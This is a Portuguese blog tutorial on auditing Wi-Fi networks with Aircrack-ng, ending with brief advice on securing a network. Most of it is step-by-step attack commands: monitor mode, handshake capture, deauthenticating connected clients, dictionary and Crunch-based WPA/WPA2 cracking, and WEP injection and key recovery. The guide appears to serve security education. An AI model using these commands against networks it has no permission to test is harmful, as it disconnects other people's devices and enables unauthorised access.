Guia Completo: Aircrack-ng - Análise e Exploração de Redes Wi-Fi

 

O Aircrack-ng é um conjunto de ferramentas avançadas para auditoria de redes Wi-Fi, permitindo capturar pacotes, realizar ataques de força bruta e testar a segurança de redes sem fio.

Este tutorial abordará:
Instalação do Aircrack-ng
Monitoramento e captura de pacotes
Ataques a redes WPA/WPA2
Cracking de senhas Wi-Fi

Atenção: Este guia tem finalidade educacional. Teste apenas redes para as quais você tem permissão.


1. Instalando o Aircrack-ng

O Aircrack-ng está disponível para Linux, macOS e Windows. No entanto, sua funcionalidade completa é melhor aproveitada no Linux, especialmente no Kali Linux.

1.1. Instalando no Kali Linux

O Aircrack-ng já vem pré-instalado no Kali Linux, mas se precisar reinstalar:

sudo apt update && sudo apt install aircrack-ng -y

Verifique se a instalação foi bem-sucedida:

aircrack-ng --help

1.2. Instalando no Ubuntu/Debian

sudo apt update && sudo apt install aircrack-ng -y

1.3. Instalando no Arch Linux

sudo pacman -S aircrack-ng

1.4. Instalando no macOS

Requer Homebrew instalado:

brew install aircrack-ng

1.5. Instalando no Windows

  1. Baixe o Aircrack-ng do site oficial:

  2. Extraia os arquivos e execute via terminal cmd ou PowerShell.


2. Preparação: Colocando a Placa de Rede em Modo Monitor

Antes de capturar pacotes, a placa de rede Wi-Fi precisa estar no modo monitor.

2.1. Identificando a Placa de Rede Wi-Fi

No terminal, liste os adaptadores de rede:

iwconfig

Você verá algo como:

wlan0     IEEE 802.11  ESSID:off/any  

Aqui, wlan0 é o nome da interface Wi-Fi.

2.2. Ativando o Modo Monitor

  1. Desative a interface de rede:

    sudo ifconfig wlan0 down
    
  2. Habilite o modo monitor:

    sudo airmon-ng start wlan0
    
  3. Confirme se o modo monitor foi ativado:

    iwconfig
    

    O nome da interface pode mudar para wlan0mon.


3. Captura de Pacotes Wi-Fi

Agora que o modo monitor está ativo, vamos capturar pacotes de redes próximas.

3.1. Listando Redes Disponíveis

sudo airodump-ng wlan0mon

Isso exibe uma lista de redes Wi-Fi detectadas, incluindo:

  • BSSID (endereço MAC do roteador)

  • Canal (CH)

  • Tipo de Criptografia (WPA, WEP, etc.)

3.2. Capturando Pacotes de uma Rede Específica

sudo airodump-ng -c <canal> --bssid <BSSID> -w captura wlan0mon

Substitua:

  • <canal> → Canal da rede (exemplo: 6)

  • <BSSID> → Endereço MAC do roteador

  • -w captura → Salva os pacotes no arquivo captura.cap

Exemplo:

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura wlan0mon

Deixe rodando até capturar pacotes suficientes.


4. Desautenticando Dispositivos para Capturar Handshake WPA/WPA2

Para capturar o 4-way handshake (necessário para crackear senhas WPA/WPA2), podemos forçar a desconexão de um dispositivo da rede.

4.1. Desautenticando um Cliente Wi-Fi

Em outro terminal, execute:

sudo aireplay-ng -0 10 -a <BSSID> -c <MAC do cliente> wlan0mon
  • <BSSID> → MAC do roteador

  • <MAC do cliente> → MAC do dispositivo conectado à rede

Isso força o dispositivo a se reconectar, capturando o handshake WPA/WPA2.


5. Crackeando Senhas WPA/WPA2

Depois de capturar o handshake, podemos tentar quebrar a senha Wi-Fi usando um ataque de força bruta.

5.1. Verificando se o Handshake foi Capturado

aircrack-ng captura.cap

Se aparecer [ WPA handshake: <BSSID> ], significa que capturamos com sucesso.

5.2. Ataque de Dicionário

Agora, vamos testar senhas usando um dicionário de palavras:

aircrack-ng -a2 -b <BSSID> -w wordlist.txt captura.cap

Substitua:

  • wordlist.txt → Arquivo contendo senhas comuns (ex: rockyou.txt)

  • <BSSID> → MAC do roteador

Se a senha estiver no dicionário, o Aircrack-ng exibirá a senha correta.

5.3. Criando um Dicionário Personalizado

Se precisar criar um dicionário de senhas, pode usar Crunch:

crunch 8 12 abc123 -o minha_wordlist.txt

Isso gera senhas entre 8 e 12 caracteres, usando abc123.


6. Ataque a Redes WEP (Obsoletas)

Se a rede Wi-Fi usa WEP (um protocolo antigo e inseguro), a senha pode ser quebrada rapidamente.

6.1. Capturando Pacotes WEP

sudo airodump-ng -c <canal> --bssid <BSSID> -w captura wlan0mon

6.2. Injetando Pacotes para Acelerar o Ataque

sudo aireplay-ng -3 -b <BSSID> wlan0mon

6.3. Quebrando a Chave WEP

Depois de capturar pacotes suficientes, execute:

aircrack-ng -b <BSSID> captura.cap

Se capturou pacotes suficientes, a senha será exibida rapidamente.


7. Protegendo sua Rede Wi-Fi

Agora que aprendemos como redes são exploradas, veja como proteger sua Wi-Fi:

Use WPA3 ou WPA2 com senhas fortes
Desative WPS (Wi-Fi Protected Setup)
Altere a senha regularmente
Monitore dispositivos conectados
Use autenticação MAC (filtragem de dispositivos)


8. Conclusão

O Aircrack-ng é uma ferramenta essencial para testes de segurança em redes Wi-Fi, permitindo:

Capturar pacotes e monitorar redes
Forçar reconexões para capturar o handshake WPA/WPA2
Realizar ataques de força bruta para descobrir senhas
Testar vulnerabilidades de redes WEP (antigas)

Com esse conhecimento, você pode proteger suas próprias redes e entender como hackers atuam no mundo da segurança cibernética! 🚀

Postar um comentário

0 Comentários